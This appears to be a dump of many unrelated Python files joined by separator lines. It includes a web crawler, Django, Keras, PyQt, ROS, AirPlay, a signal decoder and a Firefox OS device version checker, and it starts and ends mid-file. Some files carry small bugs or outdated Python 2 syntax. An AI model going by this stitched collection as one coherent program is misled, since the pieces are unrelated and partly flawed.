self.active = False
|
import requests
import argparse
import sleek_logger
import re
import hashlib
import threading
import queue
MAX_NUM_THREADS = 5
class RequestMachine(object):
def __init__(self, *args, **kwargs):
args = self.parse_args()
self.url = args.url
self.extension = self.url.split('.')[-1]
self.logged = {}
self.queue = queue.Queue()
self.threads = []
self.init_threads()
self.hasher = hashlib.md5
self.logger = sleek_logger.SleekLogger('SiteTrav.log')
self.jobs = []
self.scrape_urls(self.url)
def worker(self):
while True:
current = self.queue.get()
self.jobs.append(current)
if current is None:
break
try:
resp = requests.get(current).text
except requests.exceptions.ConnectionError:
self.logger.log('Error handling ' + current, 'error')
else:
matches = re.findall('href=[\'"]?([^\'" >]+)', resp)
for match in matches:
new_url = self.url + match
_hash = self.hasher(new_url.encode()).hexdigest()
if _hash in self.logged or (not match.startswith('/') and not match.startswith('#')):
continue
else:
self.logged[_hash] = new_url
self.logger.log('Traversing: ' + new_url)
self.scrape_urls(new_url)
self.jobs.remove(current)
if len(self.jobs) == 0:
self.add_poison()
def add_poison(self):
for t in self.threads:
self.queue.put(None)
def init_threads(self):
for i in range(MAX_NUM_THREADS):
t = threading.Thread(target=self.worker)
t.start()
self.threads.append(t)
def parse_args(self):
parser = argparse.ArgumentParser(description='Args for brute forcing requests.')
parser.add_argument('url', help='target url')
args = parser.parse_args()
return args
def test_connection(self):
counter = 0
return requests.get(self.url).status_code == 200
def scrape_urls(self, current):
self.queue.put(current)
if __name__ == '__main__':
x = RequestMachine()
|
import datetime
utc_now = datetime.datetime.utcnow()
print(utc_now)
time_now = datetime.datetime.now()
year = time_now.year
month = time_now.month
day = time_now.day
weekday = time_now.weekday()
print("Day {}, date is {} month is {} and year is {}".format(weekday, day, month, year))
|
from django.conf.urls import url, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'products', views.ProductViewSet)
router.register(r'departments', views.DepartmentViewSet)
router.register(r'features', views.FeatureViewSet)
app_name = 'catalog'
urlpatterns = [
url(r'^', include(router.urls))
]
|
from keras.datasets import cifar10
def load_cifar10():
# load the pre-shuffled train and test data
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
return x_train, y_train, x_test, y_test |
import time
begin = int(round(time.time() * 1000))
for i in range(100000):
print(i)
final = int(round(time.time() * 1000))
print(final - begin) |
# Generated by Django 2.2.4 on 2021-08-26 04:30
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0005_diabdb'),
]
operations = [
migrations.RenameField(
model_name='diabdb',
old_name='result',
new_name='result1',
),
]
|
#!/usr/bin/python
'''
@package calculator_app
@brief
@details
@author Remus Avram
@date 2014.12
'''
import sys
import os
import operator
from PyQt4 import QtCore, QtGui
from calculatorWinUI import Ui_CalculatorWindow
from calcWidgetUI import Ui_Calculator
class Window(QtGui.QMainWindow, Ui_CalculatorWindow):
def __init__(self, *args, **kwargs):
super(Window, self).__init__(*args, **kwargs)
self.setupUi(self)
self.calcWidget = Calculator()
self.setCentralWidget(self.calcWidget)
self.actionClear.triggered.connect(self.calcWidget.clear)
# END def __init__
# END class Window
class Calculator(QtGui.QWidget):
OPS = {
'+': operator.add,
'-': operator.sub,
'/': operator.div,
'*': operator.mul
}
def __init__(self, *args, **kwargs):
super(Calculator, self).__init__(*args, **kwargs)
self.ui = Ui_Calculator()
self.ui.setupUi(self)
self.ui.inputA.setValidator(QtGui.QDoubleValidator(self))
self.ui.inputB.setValidator(QtGui.QDoubleValidator(self))
self.ui.operatorBox.clear()
self.ui.operatorBox.addItems(self.OPS.keys())
self.ui.clearButton.clicked.connect(self.clear)
self.ui.inputA.textEdited.connect(self.calc)
self.ui.inputB.textEdited.connect(self.calc)
self.ui.operatorBox.currentIndexChanged.connect(self.calc)
# END def __init__
def clear(self):
''' Slot to clear the fors fields'''
self.ui.inputA.clear()
self.ui.inputB.clear()
self.ui.result.clear()
# END def clear
def calc(self):
op_str = str(self.ui.operatorBox.currentText())
op = self.OPS.get(op_str)
if not op:
return
inputA = self.ui.inputA.text()
inputB = self.ui.inputB.text()
if not (inputA and inputB):
return
try:
i1 = float(inputA)
i2 = float(inputB)
result = op(i1, i2)
except Exception, e:
QtGui.QMessageBox.warning(self, "Could not calculate result",
"Result: \n%s" %e)
else:
self.ui.result.setText(str(result))
# END class Calculator
def main():
app = QtGui.QApplication(sys.argv)
win = Window()
win.show()
win.raise_()
sys.exit(app.exec_())
if __name__ == "__main__": main() |
# -*- coding: utf-8 -*-
import utils.detection_utils as du
import utils.detection_parameters as p
import redis
import pickle
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
r = redis.StrictRedis(host=p.parameters_redis["host"], port=p.parameters_redis["port"], db=0)
r.set("start",'0')
r.set("calibrate_fields",'0')
r.set("calibrate_image",'0')
r.set("calibrate_goals",'0')
r.set("crops",pickle.dumps(None))
r.set("total_results",pickle.dumps(None))
r.set("results",pickle.dumps(None))
r.set("goals_positions",pickle.dumps({}))
r.set("goals_definitions",pickle.dumps(None))
positions = None
crops = None
angles = None
total_results = None
results = None
crops_img = None
goals_positions = {}
goals_definitions = None
def get_calibrate_football_fields(image):
global positions,crops,crops_img,angles
positions,angles = du.calibrate_football_fields(image,p.parameters_fields_ld)
crops, crops_img = du.crop_rotate_image(image,positions,angles)
return crops
def get_calibrate_image(image):
global positions,crops,crops_img,angles
crops, crops_img = du.crop_rotate_image(image,positions,angles)
return crops, crops_img
def get_football_field():
global total_results,results,angles,positions,crops_img
total_results, positions,angles, results = du.analyse_all_fields(angles,positions,p.hsv_ball,p.parameters_ball,p.teams_hsv_to_analyse,p.parameters_thymio_ld,p.parameters_dots_ld,p.parameters_directions,crops_img)
return total_results,results
def get_position(field=None, team=None, thymio_number=None):
total_results, results = get_football_field()
if total_results is not None:
if field < len(total_results):
if team in total_results[field]:
for th in total_results[field][team]:
if thymio_number == th[0]:
return th
return None
def get_football_goals():
global goals_definitions,total_results,goals_definitions
goals_definitions = pickle.loads(r.get('goals_definitions'))
get_football_field()
for g in goals_definitions:
pos = get_position(field=g[0],team=g[1],thymio_number=g[2])
if pos is not None and pos[3] is not None:
if g[0] not in goals_positions:
goals_positions[g[0]] = {}
goals_positions[g[0]][g[3]] = pos[3]
return goals_positions
def init_camera():
camera = PiCamera()
camera.resolution = p.picamera['resolution']
camera.framerate = p.picamera['framerate']
rawCapture = PiRGBArray(camera, size=p.picamera['resolution'])
return camera, rawCapture
def print_start_stop(prev_start, start):
if start != None and start.decode("utf-8") != prev_start.decode("utf-8"):
if prev_start.decode("utf-8") == "0":
print("Server started !")
else:
print("Server stopped !")
def loop_camera_redis():
global positions,crops,angles,total_results,results,crops_img
start = r.get("start")
camera, rawCapture = init_camera()
# allow the camera to warmup
time.sleep(0.1)
# capture frames from the camera
for frame in camera.capture_continuous(rawCapture, format=p.picamera['format'], use_video_port=True):
# VARIABLES
image = frame.array
image = image[::-1,...,:]
print_start_stop(start, r.get("start"))
start = r.get("start")
calibrate_fields = r.get("calibrate_fields")
calibrate_image = r.get("calibrate_image")
calibrate_goals = r.get("calibrate_goals")
# FIELD CALIBRATION
if calibrate_fields != None and calibrate_fields.decode("utf-8") == '1':
print("Début de calibration des terrains")
get_calibrate_football_fields(image)
r.set('crops',pickle.dumps(crops))
r.set("calibrate_fields",'0')
print("Calibration des terrains terminée")
# IMAGE CALIBRATION
if calibrate_image != None and calibrate_image.decode("utf-8") == '1':
print("Début de calibration de l'image")
get_calibrate_image(image)
r.set('crops',pickle.dumps(crops))
r.set("calibrate_image",'0')
print("Calibration de l'image terminée")
# GOALS CALIBRATION
if calibrate_goals != None and calibrate_goals.decode("utf-8") == '1':
print("Début de la calibration des buts")
get_football_goals()
r.set("goals_positions",goals_positions)
r.set('calibrate_goals','0')
print("Calibration des buts terminée")
# REAL TIME DETECTION
if start != None and start.decode("utf-8") == '1':
get_calibrate_image(image)
get_football_field()
r.set('total_results',pickle.dumps(total_results))
r.set('results',pickle.dumps(results))
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
print("Scanner loaded... and loop started.")
loop_camera_redis()
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest2
from tests.helper_tools import HelperTools
from thrift_medusa.utils.config import Config
from thrift_medusa.thrift.thrift_compiler import ThriftCompiler
class ThriftCompilerTest(unittest2.TestCase):
def setUp(self):
self.yaml = {}
self.yaml['name'] = 'thrift'
self.yaml['bin'] = '/bin/'
self.yaml['options'] = 'SuperOption'
self.yaml['supported_languages'] = ['a','b','c']
self.yaml['compiler_postfix'] = 'postfix'
self.yaml['version'] = '1.2.3.4'
self.compiler = ThriftCompiler(self.yaml)
def test_version(self):
expected = self.yaml['version']
self.assertEquals(expected, self.compiler.version)
expected = HelperTools.get_random()
self.compiler.version = expected
self.assertEquals(expected, self.compiler.version)
def test_bin(self):
expected = self.yaml['bin']
self.assertEquals(expected, self.compiler.bin)
expected = HelperTools.get_random()
self.compiler.bin = expected
self.assertEquals(expected, self.compiler.bin)
def test_name(self):
expected = self.yaml['name']
self.assertEquals(expected, self.compiler.name)
expected = HelperTools.get_random()
self.compiler.name = expected
self.assertEquals(expected, self.compiler.name)
def test_options(self):
expected = self.yaml['options']
self.assertEquals(expected, self.compiler.options)
expected = HelperTools.get_random()
self.compiler.options = expected
self.assertEquals(expected, self.compiler.options)
def test_compiler_postfix(self):
expected = self.yaml['compiler_postfix']
self.assertEquals(expected, self.compiler.postfix)
expected = HelperTools.get_random()
self.compiler.postfix = expected
self.assertEquals(expected, self.compiler.postfix)
def test_supported_languages(self):
expected = self.yaml['supported_languages']
self.assertEquals(expected, self.compiler.languages)
expected = HelperTools.get_random()
self.compiler.languages = expected
self.assertEquals(expected, self.compiler.languages)
self.assertTrue(self.compiler.is_language_supported(expected[0]))
self.assertFalse(self.compiler.is_language_supported("zzzzzzzz"))
def test_bad_init_data(self):
dict = {}
conf = Config()
bad_compiler = ThriftCompiler(dict)
self.assertEquals(bad_compiler.version, "0.6.1")
self.assertEquals(bad_compiler.postfix, "")
language = "java"
self.assertEquals(bad_compiler.is_language_supported("java"), False)
self.assertEquals(bad_compiler.language_options(), conf.get_thrift_option("global_compiler_options")[language] )
if __name__ == '__main__':
unittest2.main()
|
#!/usr/bin/python3.5
# Install packages to use Python3 with ROS
# sudo apt-get install python3-yaml
# sudo pip3 install rospkg catkin_pkg
import rospy
import sys
from std_msgs.msg import String
def talker():
pub = rospy.Publisher('chatter', String, queue_size=10)
rospy.init_node('talker', anonymous=True)
rate = rospy.Rate(1) # 10hz
print ("Python Version: ", sys.version)
while not rospy.is_shutdown():
hello_str = "hello world %s" % rospy.get_time()
rospy.loginfo(hello_str)
pub.publish(hello_str)
rate.sleep()
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass
|
#!/usr/bin/env python
import socket
import select
import sys
import pybonjour
import time
selectedVideo = sys.argv[1]
regtype = "_airplay._tcp"
timeout = 5
resolved = []
host = None
queried = []
#
# Data Model for a Air Play Device
#
class AirPlayDevice:
def __init__(self, interfaceIndex, fullname, hosttarget, port):
self.interfaceIndex = interfaceIndex
self.fullname = fullname
self.hosttarget = hosttarget
self.port = port;
self.displayname = hosttarget.replace(".local.", "")
self.ip = 0
# Defines the Post message to play the selected video
def post_message(sel_vid):
body = "Content-Location: %s\nStart-Position: 0\n\n" % (sel_vid)
return "POST /play HTTP/1.1\n" \
"Content-Length: %d\n" \
"User-Agent: MediaControl/1.0\n\n%s" % (len(body), body)
#
# Connecting to the selected AirPlay device
# and sends the video to it
def connect_to_socket(ip, port):
print "connect to socket"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(post_message(selectedVideo))
var = 1
print "Press CTRL-C to end."
timeTrigger = 0
while var == 1 : # This constructs an infinite loop
# keep the socket alive by sending a packet once per second
curTime = time.time()
if curTime > timeTrigger:
s.send("\0")
timeTrigger = curTime + 1
# Gets the IP from selected device
def query_record_callback(sdRef, flags, interfaceIndex, errorCode, fullname, rrtype, rrclass, rdata, ttl):
if errorCode == pybonjour.kDNSServiceErr_NoError:
host.ip = socket.inet_ntoa(rdata)
queried.append(True)
def resolve_callback(sdRef, flags, interfaceIndex, errorCode, fullname,
hosttarget, port, txtRecord):
if errorCode == pybonjour.kDNSServiceErr_NoError:
print 'Resolved service:'
print ' fullname =', fullname
print ' hosttarget =', hosttarget
print ' port =', port
global host
host = AirPlayDevice(interfaceIndex, fullname, hosttarget, port)
resolved.append(True)
def browse_callback(sdRef, flags, interfaceIndex, errorCode, serviceName,
regtype, replyDomain):
print "browse callback"
if errorCode != pybonjour.kDNSServiceErr_NoError:
return
if not (flags & pybonjour.kDNSServiceFlagsAdd):
print 'Service removed'
return
print 'Service added; resolving'
resolve_sdRef = pybonjour.DNSServiceResolve(0,
interfaceIndex,
serviceName,
regtype,
replyDomain,
resolve_callback)
try:
while not resolved:
ready = select.select([resolve_sdRef], [], [], timeout)
if resolve_sdRef not in ready[0]:
print 'Resolve timed out'
break
pybonjour.DNSServiceProcessResult(resolve_sdRef)
else:
resolved.pop()
finally:
resolve_sdRef.close()
browse_sdRef = pybonjour.DNSServiceBrowse(regtype = regtype,
callBack = browse_callback)
try:
try:
while not host:
ready = select.select([browse_sdRef], [], [])
if browse_sdRef in ready[0]:
pybonjour.DNSServiceProcessResult(browse_sdRef)
except KeyboardInterrupt:
pass
finally:
browse_sdRef.close()
query_sdRef = pybonjour.DNSServiceQueryRecord(interfaceIndex = host.interfaceIndex,
fullname = host.hosttarget,
rrtype = pybonjour.kDNSServiceType_A,
callBack = query_record_callback)
try:
while not queried:
ready = select.select([query_sdRef], [], [], timeout)
if query_sdRef not in ready[0]:
print "Query not in record"
break
pybonjour.DNSServiceProcessResult(query_sdRef)
else:
queried.pop()
finally:
query_sdRef.close()
connect_to_socket(host.ip, host.port)
|
import config
import codebook64 as CODEBOOK
import math
import numpy as np
import itertools
import copy
eta = [];
epsilon = [];
class _DecoderHelper():
def getCombination(self, k, j):
listUsers = []
for i, user in enumerate(eta[k]):
if user != j:
listUsers.append(CODEBOOK.getCodewords(user)[k]);
return list(itertools.product(*listUsers));
def buildEta(self, factorGraph):
global eta;
eta = [];
for k in range(factorGraph.shape[0]):
temp = [];
for i,vNode in enumerate(factorGraph[k]):
if vNode == 1:
temp.append(i+1);
eta.append(temp);
def buildEpsilon(self, factorGraph):
global epsilon;
epsilon = [];
for j in range(factorGraph.shape[1]):
temp = [];
for i,fNode in enumerate(factorGraph[:,j]):
if fNode == 1:
temp.append(i+1);
epsilon.append(temp);
def getMessage(self, k, j, cw):
combination = np.sum(self.getCombination(k,j),axis=1)+CODEBOOK.getCodeword(j, cw)[k];
resourceK = np.reshape(config.resourceLayer[:,k], (config.resourceLayer[:,k].shape[0],1))
resourceK = np.repeat(resourceK, 16, axis=1);
dividend = resourceK-combination;
return np.exp(-(dividend*dividend.conjugate())/(config.sigma**2))
def productSequencev_f(self, k, j, cw):
usersProb = [];
for i, user in enumerate(eta[k]):
if user != j:
usersProb.append(config.Ev_f[:,k, user-1].transpose());
usersProb = np.asarray(usersProb);
#print("itertools userProb", usersProb.shape)
#usersProb = usersProb.transpose();
#print("itertools userProb", usersProb.shape)
#print(np.asarray(list(itertools.product(*usersProb))).shape)
return np.prod(list(itertools.product(*usersProb)),axis=1).transpose()
def getEf_v(self, k, j, cw):
return np.sum(self.getMessage(k, j, cw)*self.productSequencev_f(k,j,cw),axis=1);
def productSequencef_v(self,k,j):
resourcesProb = np.ones(shape=(config.numSymbols,config.numCodeWords),dtype = np.float)
for i, resource in enumerate(epsilon[j]):
if resource != k:
resourcesProb = resourcesProb*config.Ef_v[:,resource-1,j]
return resourcesProb
def All_productSequencef_v(self,j):
resourcesProb = np.ones(shape=(config.numSymbols,config.numCodeWords))
for i, resource in enumerate(epsilon[j]):
resourcesProb = resourcesProb*config.Ef_v[:,resource-1,j]
return resourcesProb
def magnitude(self,v):
return np.sqrt(np.sum(np.square(np.absolute(v)),axis=1));
def add(u, v):
return [ u[i]+v[i] for i in range(len(u)) ]
def sub(u, v):
return [ u[i]-v[i] for i in range(len(u)) ]
def dot(u, v):
return sum(u[i]*v[i] for i in range(len(u)))
def normalize(self,v):
vmag = np.sum(np.absolute(v),axis=1);
v = v / vmag[:,None];
return v;
def getEv_f(self,k, j):
normalizedProduct = self.normalize(self.productSequencef_v(k,j));
#print("********after normalization********")
#print(normalizedProduct,k,j)
return normalizedProduct;
DECODERHELPER = _DecoderHelper();
def init():
DECODERHELPER.buildEta(config.factorGraph);
DECODERHELPER.buildEpsilon(config.factorGraph);
def messagePassing():
# update message from Function Node to Variable Node
for k in range(config.factorGraph.shape[0]):
for j, j_th in enumerate(eta[k]):
for index in range(config.numCodeWords):
config.Ef_v[:,k,j_th-1,index] = DECODERHELPER.getEf_v(k,j_th,index);
# update message from V Node to F Node
for j in range(config.factorGraph.shape[1]):
for k, k_th in enumerate(epsilon[j]):
config.Ev_f[:,k_th-1,j,:] = DECODERHELPER.getEv_f(k_th,j);
def iterativeMPA(iteration):
iterationThreshold = 0;
temp = [];
iterationEnd = 0;
for i in range(iteration):
temp = copy.copy( config.EstimatedSymbols);
iterationEnd = copy.copy(i)
#print("estimateSymbol",config.EstimatedSymbols)
if iterationThreshold > 2:
break;
messagePassing();
estimateSymbol();
if np.allclose(temp, config.EstimatedSymbols):
iterationThreshold += 1;
#print("iteration end", iterationEnd)
return iterationEnd;
def estimateSymbol():
for j in range(config.factorGraph.shape[1]):
config.EstimatedSymbols[j] = np.argmax(DECODERHELPER.All_productSequencef_v(j),axis=1);
|
from Tkinter import *
from PIL import Image, ImageTk
root = Tk()
w = Canvas(root, width=300, height=300)
im = Image.open("Lenna.png")
photo = ImageTk.PhotoImage(im)
w.create_image(100, 100, image=photo, anchor=CENTER)
w.create_text(100, 240, font=("Arial",16), text="Hello", fill="red")
w.create_text(100, 270, font=("Arial",16), text="world!", fill="blue")
w.pack()
root.mainloop()
|
# num = input("请问你想抽奖多少次:")
# num = int(num)
# for i in range(num):
# print("抽第%d次" % (i+1))
# print("抽第{}次".format(i+1))
# print("抽奖完毕,祝您好运。")
# for i in range(1, 10):
# for j in range(1, i+1):
# a = i*j
# print("{}*{}={}\t".format(i, j, a), end="")
# print()
# for i in range(1, 10):
# for j in range(1,i+1):
# print("%d*%d=%d\t"%(j,i,i*j),end="")
# print()
# a = 1
# count = 1
# while count < 100:
# a += 1
# print(a)
# count += 1
# print(a + a)
# sum = 0
# count = 1
# while count < 101:
# sum += count
# count += 1
# print(sum)
# for i in range(1, 101):
# # j j = i+1
# # sum1 = i +
# # sum += int(sum1)
# sum = 0
# sum += i
# sum += sum
# print(su)
# sum = 0
# for i in range(1, 101):
# sum += i
# print(sum)
# play = input("欢迎参加幸运大抽奖,请问您要抽几次:")
# count = 1
# while count < int(play)+1:
# if count == 7:
# print("恭喜你抽中大奖")
# count += 1
# continue
# print("第{}次".format(count))
# count += 1
# print("抽奖结束")
# play = input("欢迎参加幸运大抽奖,请问您要抽几次:")
# count = 1
# while count < int(play)+1:
# if count == 7:
# print("恭喜你抽中大奖")
# count += 1
# break
# print("第{}次".format(count))
# count += 1
# print("抽奖结束")
# count = 1
# while count < 11:
# if count == 6:
# print("不合格")
# count += 1
# continue
# print("合格")
# count += 1
# num = int(input("今天要吃几个包子?"))
# for i in range(1, num+1):
# if i == 11:
# break
# print("第{}个".format(i))
# else:
# print("吃完了,好饱")
# print("over")
# for b in range(1, 10):
# for s in range(1, 10):
# for g in range(1, 10):
# sum1 = int(b)*100 + int(s)*10 + int(g)
# sum2 = b**3 + s**3 + g**3
# if sum1 == sum2:
# print("百位数为:{},十位数为:{},个位数为;{}".format(b, s, g))
# # else:
# # print("none")
for g in range(1, 100):
for m in range(1, 100):
for j in range(1, 100):
sum1 = int(g)*15 + int(m)*9 + int(j)
sum2 = int(g) + int(m) + int(j)
if int(sum1) == 300 and int(sum2) == 100:
print("公鸡{}只,母鸡{}只,小鸡{}只".format(g, m, j))
else:
print("完")
|
from flask import render_template
from .import app
@app.app_errorhandler(404)
def fourowfour(error):
return render_template('fourowfour.html'), 404 |
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import re
import os
import json
import shutil
import logging
import zipfile
import tempfile
import argparse
import subprocess
from distutils import util
from datetime import datetime
from argparse import ArgumentDefaultsHelpFormatter
from util import console_utilities
from util.adb_helper import AdbHelper
from util.adb_helper import AdbWrapper
logger = logging.getLogger(__name__)
class VersionChecker(object):
def __init__(self):
self.devices = None
self.device_info_list = []
self.no_color = False
self.serial = None
self.log_text = None
self.log_json = None
def set_serial(self, serial):
"""
Setup the serial number.
@param serial: the given serial number.
"""
self.serial = serial
logger.debug('Set serial: {}'.format(self.serial))
def set_no_color(self, flag):
"""
Setup the no_color flag.
@param flag: True or Flas.
"""
self.no_color = flag
logger.debug('Set no_color: {}'.format(self.no_color))
def set_log_text(self, log_text):
"""
Setup the log_text file path.
@param log_text: the output text file path.
"""
self.log_text = log_text
logger.debug('Set log_text: {}'.format(self.log_text))
def set_log_json(self, log_json):
"""
Setup the log_json file path.
@param log_json: the outpupt json file path.
"""
self.log_json = log_json
logger.debug('Set log_json: {}'.format(self.log_json))
def cli(self):
"""
Handle the argument parse, and the return the instance itself.
"""
# argument parser
arg_parser = argparse.ArgumentParser(description='Check the version information of Firefox OS.',
formatter_class=ArgumentDefaultsHelpFormatter)
arg_parser.add_argument('--no-color', action='store_true', dest='no_color', default=False,
help='Do not print with color. NO_COLOR will overrides this option.')
arg_parser.add_argument('-s', '--serial', action='store', dest='serial', default=None,
help='Directs command to the device or emulator with the given serial number. '
'Overrides ANDROID_SERIAL environment variable.')
arg_parser.add_argument('--log-text', action='store', dest='log_text', default=None, help='Text ouput.')
arg_parser.add_argument('--log-json', action='store', dest='log_json', default=None, help='JSON output.')
arg_parser.add_argument('-v', '--verbose', action='store_true', dest='verbose', default=False,
help='Turn on verbose output, with all the debug logger.')
# parse args and setup the logging
args = arg_parser.parse_args()
# setup the logging config
if args.verbose is True:
verbose_formatter = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.DEBUG, format=verbose_formatter)
else:
formatter = '%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=formatter)
# check ADB
AdbWrapper.check_adb()
# assign variable
self.set_no_color(args.no_color)
self.set_serial(args.serial)
self.set_log_text(args.log_text)
self.set_log_json(args.log_json)
# return instance
return self
@staticmethod
def get_device_info(serial=None):
"""
Get the device information, include Gaia Version, Gecko Version, and so on.
@param serial: device serial number. (optional)
@return: the information dict object.
"""
tmp_dir = None
try:
tmp_dir = tempfile.mkdtemp(prefix='checkversions_')
# pull data from device
try:
AdbWrapper.adb_pull('/system/b2g/omni.ja', tmp_dir, serial=serial)
except Exception as e:
logger.debug(e)
logger.error('Error pulling Gecko file.')
try:
AdbWrapper.adb_pull('/data/local/webapps/settings.gaiamobile.org/application.zip', tmp_dir,
serial=serial)
except Exception as e:
logger.debug(e)
try:
AdbWrapper.adb_pull('/system/b2g/webapps/settings.gaiamobile.org/application.zip', tmp_dir,
serial=serial)
except Exception as e:
logger.debug(e)
logger.error('Error pulling Gaia file.')
try:
AdbWrapper.adb_pull('/system/b2g/application.ini', tmp_dir, serial=serial)
except Exception as e:
logger.debug(e)
logger.error('Error pulling application.ini file.')
# get Gaia info
gaia_rev = 'n/a'
gaia_date = 'n/a'
application_zip_file = os.path.join(tmp_dir, 'application.zip')
if os.path.isfile(application_zip_file):
with open(application_zip_file, 'rb') as f:
z = zipfile.ZipFile(f)
z.extract('resources/gaia_commit.txt', tmp_dir)
else:
logger.warning('Can not find application.zip file.')
gaiacommit_file = os.path.join(tmp_dir, 'resources/gaia_commit.txt')
if os.path.isfile(gaiacommit_file):
with open(gaiacommit_file, "r") as f:
gaia_rev = re.sub(r'\n+', '', f.readline())
gaia_date_sec_from_epoch = re.sub(r'\n+', '', f.readline())
gaia_date = datetime.utcfromtimestamp(int(gaia_date_sec_from_epoch)).strftime('%Y-%m-%d %H:%M:%S')
else:
logger.warning('Can not get gaia_commit.txt file from application.zip file.')
# deoptimize omni.ja for Gecko info
gecko_rev = 'n/a'
if os.path.isfile(os.path.join(tmp_dir, 'omni.ja')):
deopt_dir = os.path.join(tmp_dir, 'deopt')
deopt_file = os.path.join(deopt_dir, 'omni.ja')
deopt_exec = os.path.join(tmp_dir, 'optimizejars.py')
os.makedirs(deopt_dir)
# TODO rewrite optimizejars.py if possible
current_dir = os.path.dirname(os.path.abspath(__file__))
current_exec = os.path.join(current_dir, 'misc', 'optimizejars.py')
shutil.copyfile(current_exec, deopt_exec)
cmd = 'python %s --deoptimize %s %s %s' % (deopt_exec, tmp_dir, tmp_dir, deopt_dir)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = p.communicate()[0]
logger.debug('optimizejars.py stdout: {}'.format(output))
# unzip omni.ja to get Gecko info
if os.path.isfile(deopt_file):
with open(deopt_file, 'rb') as f:
z = zipfile.ZipFile(f)
z.extract('chrome/toolkit/content/global/buildconfig.html', tmp_dir)
else:
logger.warning('Can not deoptimize omni.ja file.')
gecko_rev = 'n/a'
# get Gecko info from buildconfig.html file
buildconfig_file = os.path.join(tmp_dir, 'chrome/toolkit/content/global/buildconfig.html')
if os.path.isfile(buildconfig_file):
for line in open(buildconfig_file, "r"):
if re.search(r'Built from', line):
ret = re.findall(r'>(.*?)<', line)
gecko_rev = ret[1]
break
else:
logger.warning('Can not get buildconfig.html file from omni.ja file.')
else:
print 'Can not find omni.ja file.'
# get Gecko version, and B2G BuildID from application.ini file
build_id = 0
version = 0
if os.path.isfile(os.path.join(tmp_dir, 'application.ini')):
for line in open(os.path.join(tmp_dir, 'application.ini'), "r"):
if re.search(r'^\s*BuildID', line):
ret = re.findall(r'.*?=(.*)', line)
build_id = ret[0]
if re.search(r'^\s*Version', line):
ret = re.findall(r'.*?=(.*)', line)
version = ret[0]
else:
build_id = 'n/a'
version = 'n/a'
# get device information by getprop command
device_name = re.sub(r'\r+|\n+', '', AdbWrapper.adb_shell('getprop ro.product.device', serial=serial)[0])
firmware_release = re.sub(r'\r+|\n+', '',
AdbWrapper.adb_shell('getprop ro.build.version.release', serial=serial)[0])
firmware_incremental = re.sub(r'\r+|\n+', '',
AdbWrapper.adb_shell('getprop ro.build.version.incremental', serial=serial)[
0])
firmware_date = re.sub(r'\r+|\n+', '', AdbWrapper.adb_shell('getprop ro.build.date', serial=serial)[0])
firmware_bootloader = re.sub(r'\r+|\n+', '',
AdbWrapper.adb_shell('getprop ro.boot.bootloader', serial=serial)[0])
# prepare the return information
device_info = {'Serial': serial,
'Build ID': build_id,
'Gaia Revision': gaia_rev,
'Gaia Date': gaia_date,
'Gecko Revision': gecko_rev,
'Gecko Version': version,
'Device Name': device_name,
'Firmware(Release)': firmware_release,
'Firmware(Incremental)': firmware_incremental,
'Firmware Date': firmware_date,
'Bootloader': firmware_bootloader}
finally:
if tmp_dir:
shutil.rmtree(tmp_dir)
logger.debug('Remove {}.'.format(tmp_dir))
return device_info
@staticmethod
def _print_device_info_item(title, value, title_color=None, value_color=None):
console_utilities.print_color('{0:22s}'.format(title), fg_color=title_color, newline=False)
console_utilities.print_color(value, fg_color=value_color)
def print_device_info(self, device_info, no_color=False):
"""
Print the device information.
@param device_info: The information dict object.
@param no_color: Print with color. Default is False.
"""
# setup the format by platform
if no_color:
title_color = None
sw_color = None
hw_color = None
else:
title_color = console_utilities.COLOR_LIGHT_BLUE
sw_color = console_utilities.COLOR_LIGHT_GREEN
hw_color = console_utilities.COLOR_LIGHT_YELLOW
# print the device information
self._print_device_info_item('Build ID', device_info['Build ID'], title_color=title_color, value_color=sw_color)
self._print_device_info_item('Gaia Revision', device_info['Gaia Revision'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gaia Date', device_info['Gaia Date'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gecko Revision', device_info['Gecko Revision'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Gecko Version', device_info['Gecko Version'], title_color=title_color,
value_color=sw_color)
self._print_device_info_item('Device Name', device_info['Device Name'], title_color=title_color,
value_color=hw_color)
self._print_device_info_item('Firmware(Release)', device_info['Firmware(Release)'], title_color=title_color,
value_color=hw_color)
self._print_device_info_item('Firmware(Incremental)', device_info['Firmware(Incremental)'],
title_color=title_color, value_color=hw_color)
self._print_device_info_item('Firmware Date', device_info['Firmware Date'], title_color=title_color,
value_color=hw_color)
if device_info['Bootloader'] is not '':
self._print_device_info_item('Bootloader', device_info['Bootloader'], title_color=title_color,
value_color=hw_color)
print ''
def _output_log(self):
"""
Write the information into file.
Enable it by I{--log-text} and I{--log-json} arguments.
"""
if self.log_json is None and self.log_text is None:
return
# prepare the result dict for parsing
result = self.get_output_dict()
# output
if self.log_text is not None:
with open(self.log_text, 'w') as outfile:
for device_serial, device_info in result.items():
outfile.write('# %s\n' % device_serial)
if 'Skip' in device_info and device_info['Skip'] is True:
outfile.write('%s=%s\n' % ('Skip', device_info['Skip']))
else:
for key, value in device_info.items():
